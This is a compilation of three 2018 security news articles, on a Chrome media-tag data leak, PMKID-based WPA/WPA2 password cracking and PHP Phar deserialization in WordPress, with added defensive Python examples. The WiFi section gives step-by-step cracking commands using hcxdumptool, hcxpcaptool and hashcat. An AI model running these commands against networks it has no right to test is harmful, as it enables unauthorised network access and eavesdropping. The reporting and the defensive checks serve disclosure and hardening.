(BEING CONTINUED FROM 8/04/17)
A)Chrome Bug Allowed Hackers to Find Out Everything Facebook Knows About You
With the release of Chrome 68, Google prominently marks all non-HTTPS websites as ‘Not Secure’ on its browser to make the web a more secure place for Internet users.
If you haven’t yet, there is another significant reason to immediately switch to the latest version of the Chrome web browser.
Ron Masas, a security researcher from Imperva, has discovered a vulnerability in web browsers that could allow attackers to find out everything other web platforms, like Facebook and Google, know about you, and all they need to do is trick you into visiting a website.
The vulnerability, identified as CVE-2018-6177, takes advantage of a weakness in audio/video HTML tags and affects all web browsers powered by “Blink Engine,” including Google Chrome.
To illustrate the attack scenario, the researcher took an example of Facebook, a popular social media platform that collects in-depth profiling information on its users, including their age, gender, where you have been (location data) and interests, i.e., what you like and what you don’t.
You may be aware that Facebook offers a post targeting feature to page administrators, allowing them to define a targeted or restricted audience for specific posts based on age, location, gender and interests.
How Does the Browser Attack Work?
To demonstrate the vulnerability, the researcher created multiple Facebook posts with different combinations of the restricted audiences to categorize victims according to their age, location, interest or gender.
Now, if a website embeds all these Facebook posts on a web page, it will load and display only a few specific posts at the visitors’ end based on individuals’ profile data on Facebook that matches restricted audience settings.
For example, if a post defined to be visible only to Facebook users who are 26, male and interested in hacking or information security loaded successfully, an attacker can potentially learn personal information about visitors, regardless of their privacy settings.
Though the idea sounds exciting and quite simple, there are no direct ways available for site administrators to determine whether an embedded post was loaded successfully for a specific visitor or not.
That is thanks to Cross-Origin Resource Sharing (CORS), a browser security mechanism that prevents a website from reading the content of other sites without their explicit permission.
However, the Imperva researcher found that since audio and video HTML tags neither validate the content type of fetched resources nor reject responses with invalid MIME types, an attacker can use multiple hidden video or audio tags on a website to request Facebook posts.
“With several scripts running at once — each testing a different and unique restriction — the bad actor can relatively quickly mine a good amount of private data about the user,” Masas said.
“I found that by engineering sites to return a different response size depending on the currently logged user properties it is possible to use this method to extract valuable information.”
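The attack above only works because the victim’s browser attaches their session cookies to the hidden media requests and accepts a non-media response. Added example, not from the article or Imperva: a small audit of the response headers a site would want on any endpoint that can be embedded from a third-party page. The mitigations it checks for (a declared Content-Type, X-Content-Type-Options: nosniff, SameSite on session cookies) are assumed general hardening for this class of cross-site leak, not something the article lists; the sample responses are constructed.

```python
from typing import Dict, List

def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse a raw HTTP header block into a lower-cased name -> values
    map; repeated headers such as Set-Cookie are all kept."""
    headers: Dict[str, List[str]] = {}
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def audit_embed_response(raw: str) -> List[str]:
    """Findings for a response that another site could load through a
    hidden <video>/<audio> tag while the victim's cookies are attached.
    Assumed mitigations (not from the article): declare a Content-Type,
    send X-Content-Type-Options: nosniff so the declared type is
    enforced, and mark session cookies SameSite so cross-site embeds
    are fetched without the victim's session at all."""
    h = parse_headers(raw)
    findings: List[str] = []
    if not h.get("content-type", [""])[0].strip():
        findings.append("missing Content-Type: browser may sniff the body")
    if "nosniff" not in [v.lower() for v in h.get("x-content-type-options", [])]:
        findings.append("missing X-Content-Type-Options: nosniff")
    for cookie in h.get("set-cookie", []):
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if not any(a in ("samesite=lax", "samesite=strict") for a in attrs):
            name = cookie.split("=", 1)[0]
            findings.append(f"cookie {name} is sent on cross-site embeds (no SameSite=Lax/Strict)")
    return findings

# Constructed sample responses for a hypothetical "embedded post" endpoint.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=abc123; Secure; HttpOnly
"""
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax
"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_embed_response(raw) or ["no findings"])
```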
A member of the Google security team also pointed out that the vulnerability could work against websites that use APIs to fetch user-session-specific information.
The core of this vulnerability has some similarities with another browser bug, patched in June this year, which exploited a weakness in how web browsers handle cross-origin requests to video and audio files, allowing attackers to read the content of your Gmail or private Facebook messages.
The Imperva researcher reported the vulnerability to Google with a proof-of-concept exploit, and the Chrome team patched the issue in the Chrome 68 release.
So, Chrome users are strongly recommended to update their browser to the latest version, if they haven’t yet.
B)How to Hack WiFi Password Easily Using New Attack On WPA/WPA2
Looking for how to hack a WiFi password, or for WiFi hacking software?
Well, a security researcher has revealed a new WiFi hacking technique that makes it easier for hackers to crack WiFi passwords of most modern routers.
Discovered by the lead developer of the popular password-cracking tool Hashcat, Jens ‘Atom’ Steube, the new WiFi hack works explicitly against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.
The attack to compromise the WPA/WPA2 enabled WiFi networks was accidentally discovered by Steube while he was analyzing the newly-launched WPA3 security standard.
This new WiFi hacking method could potentially allow attackers to recover the Pre-Shared Key (PSK) login password, allowing them to break into your Wi-Fi network and eavesdrop on Internet communications.
How to Hack WiFi Password Using PMKID
According to the researcher, previously known WiFi hacking methods required attackers to wait for someone to log into a network and capture a full 4-way authentication handshake of EAPOL, a network port authentication protocol.
By contrast, the new attack no longer requires another user to be on the target network to capture credentials. Instead, it is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL (Extensible Authentication Protocol over LAN) frame, after requesting it from the access point.
Robust Security Network is a protocol for establishing secure communications over an 802.11 wireless network, and the PMKID, the key needed to establish a connection between a client and an access point, is one of its capabilities.
Step 1 — An attacker can use a tool, like hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
The result is the password of the target wireless network; cracking it may take time depending on its length and complexity.
“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said.
Since the new WiFi hack only works against networks with roaming functions enabled and requires attackers to brute force the password, users are recommended to protect their WiFi network with a secure password that’s difficult to crack.
This WiFi hack also does not work against next-generation wireless security protocol WPA3, since the new protocol is “much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”
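The three steps above and the advice to pick a strong passphrase both come down to one derivation: the PMKID depends only on the PSK, the SSID and the two MAC addresses, so a single frame is enough and every guess is tested offline. Added example, not from the article, hashcat or hcxtools: the standard WPA2-PSK derivation behind hashcat mode 16800, with a check of one guess against a line in the 16800 layout. The SSID, passphrase and MAC addresses are constructed placeholders.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """802.11i PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC).
    No handshake material is involved, which is why a single frame from
    the access point is enough for the attack described above."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def hashcat_16800_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Layout of the line hcxpcaptool writes for hashcat -m 16800:
    PMKID*AP_MAC*STA_MAC*SSID_HEX (lower-case hex, MACs without separators)."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])

def pmkid_matches(line: str, candidate: str) -> bool:
    """Test one passphrase guess against a 16800 line. This is the whole
    per-guess cost of the offline attack, dominated by the 4096 PBKDF2
    rounds, so only passphrase entropy decides how long cracking takes."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.split("*")
    pmk = derive_pmk(candidate, bytes.fromhex(ssid_hex).decode())
    expected = derive_pmkid(pmk, bytes.fromhex(ap_hex), bytes.fromhex(sta_hex))
    return hmac.compare_digest(expected.hex(), pmkid_hex)

# Constructed lab values: placeholder MAC addresses, demo SSID and passphrase.
AP_MAC = bytes.fromhex("0011223344ff")
STA_MAC = bytes.fromhex("66778899aabb")
DEMO_SSID = "LabNet"
DEMO_PASSPHRASE = "correct horse battery staple"
DEMO_LINE = hashcat_16800_line(
    derive_pmkid(derive_pmk(DEMO_PASSPHRASE, DEMO_SSID), AP_MAC, STA_MAC),
    AP_MAC, STA_MAC, DEMO_SSID)

if __name__ == "__main__":
    print(DEMO_LINE)
    print(pmkid_matches(DEMO_LINE, DEMO_PASSPHRASE), pmkid_matches(DEMO_LINE, "password"))
```

The derive_pmk function reproduces the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE"), which is a quick way to confirm the derivation is the standard one.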
C)New PHP Code Execution Attack Puts WordPress Sites at Risk
Sam Thomas, a security researcher from Secarma, has discovered a new exploitation technique that could make it easier for hackers to trigger critical deserialization vulnerabilities in the PHP programming language using functions previously considered low-risk.
The new technique leaves hundreds of thousands of web applications open to remote code execution attacks, including websites powered by some popular content management systems like WordPress and Typo3.
PHP unserialization or object injection vulnerabilities were initially documented in 2009, which could allow an attacker to perform different kinds of attacks by supplying malicious inputs to the unserialize() PHP function.
If you are unaware, serialization is the process of converting data objects into a plain string, and the unserialize() function helps a program recreate an object from such a string.
Thomas found that, in a wide range of scenarios, an attacker can use low-risk functions against Phar archives to trigger a deserialization attack without using the unserialize() function at all.
Phar files, an archive format in PHP, store metadata in serialized form, which gets unserialized whenever a file operation function (fopen, file_exists, file_get_contents, etc.) accesses the archive file.
“This is true for both direct file operations (such as “file_exists”) and indirect operations such as those that occur during external entity processing within XML (i.e., when an XXE vulnerability is being exploited),” Thomas said.
Exploiting PHP Deserialization Attack Against WordPress Sites
In a detailed paper released at Black Hat conference last week, Thomas demonstrated how this attack can be executed against WordPress sites using an author account to take full control over the web server.
For successful exploitation of the flaw, all an attacker needs to do is upload a valid Phar archive containing the malicious payload object onto the target’s local file system and make a file operation function access it via the “phar://” stream wrapper.
Thomas also revealed that an attacker can even exploit this vulnerability using a JPEG image: a Phar archive converted into a valid JPEG by modifying its first 100 bytes.
“The way certain thumbnail functionality within the application [WordPress] works enables an attacker with the privileges to upload and modify media items to gain sufficient control of the parameter used in a “file_exists” call to cause unserialization to occur,” the researcher said.
Once the crafted thumbnail is uploaded to the targeted WordPress server, the attacker can use another function to open the same image file as a Phar archive via the “phar://” stream wrapper, which executes the arbitrary code when the program deserializes the metadata.
“The vulnerability exists due to insecure deserialization of data passed as an image file and then executed via the ‘phar://’ stream wrapper within the ‘wp_get_attachment_thumb_file’ function in ‘/wpincludes/post.php’ script,” an advisory reads.
“A remote authenticated attacker with the ability to create/edit posts can upload a malicious image and execute arbitrary PHP code on a vulnerable system.”
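Two things make the WordPress case work: the upload is accepted as an image although it carries a Phar archive, and a user-influenced value reaches file_exists() with a “phar://” prefix. Added example, not from Secarma’s paper or from WordPress: a defender-side check for each half, written in Python as a stand-in for the PHP-side validation. It relies on one fact about the format, that every Phar stub must end with __HALT_COMPILER(); followed by the manifest holding the serialized metadata; the sample blobs are constructed and the polyglot is only the byte layout the check cares about, not a decodable image.

```python
import re

# Every Phar stub must end with __HALT_COMPILER(); the manifest with the
# serialized metadata follows it. A genuine image has no reason to contain it.
PHAR_STUB_MARKER = re.compile(rb"__HALT_COMPILER\s*\(\s*\)\s*;", re.IGNORECASE)
# PHP serialized object header: O:<len>:"<class>":<n>:{
SERIALIZED_OBJECT = re.compile(rb'O:\d+:"[^"]+":\d+:\{')
JPEG_MAGIC = b"\xff\xd8\xff"

def inspect_upload(data: bytes) -> dict:
    """Describe an uploaded blob: JPEG by magic bytes, presence of a Phar
    stub, and serialized object data after the stub (what unserialize()
    would be handed once the file is opened through phar://)."""
    stub = PHAR_STUB_MARKER.search(data)
    result = {
        "looks_like_jpeg": data.startswith(JPEG_MAGIC),
        "phar_stub": stub is not None,
        "serialized_object_after_stub": False,
    }
    if stub:
        result["serialized_object_after_stub"] = (
            SERIALIZED_OBJECT.search(data, stub.end()) is not None)
    return result

def is_polyglot_phar(data: bytes) -> bool:
    """Upload policy for media: reject anything carrying a Phar stub."""
    return inspect_upload(data)["phar_stub"]

def is_safe_local_path(user_supplied: str) -> bool:
    """The other half of the fix, as a Python stand-in for the PHP-side
    check: a value that reaches file_exists()/fopen() must not carry a
    stream wrapper prefix such as phar:// (any scheme is rejected)."""
    return re.match(r"^[a-z][a-z0-9+.\-]*://", user_supplied, re.IGNORECASE) is None

# Constructed samples: a plain JPEG header, and a JPEG-headed blob with
# a Phar stub and a harmless serialized object where the metadata sits.
CLEAN_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 64
POLYGLOT = (JPEG_MAGIC + b"\xfe\x00\x20"
            + b"<?php __HALT_COMPILER(); ?>\r\n"
            + b"\x00" * 12
            + b'O:7:"DemoObj":1:{s:1:"x";i:1;}')

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT)):
        print(label, inspect_upload(blob), "reject" if is_polyglot_phar(blob) else "accept")
    print(is_safe_local_path("uploads/2018/08/photo.jpg"), is_safe_local_path("phar://uploads/photo.jpg"))
```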
Thomas reported this vulnerability to the WordPress security team earlier last year, and the company acknowledged the issue. However, the patch released by the company did not address the problem completely.
Thomas also reported the vulnerability to Typo3 on 9th June 2018, and the vendor addressed the issue in versions 7.6.30, 8.7.17 and 9.3.
For more details about the vulnerability, you can head over to the detailed paper [PDF] published by Secarma.
(TO BE CONTINUED)
SOURCE http://thehackernews.com 08/18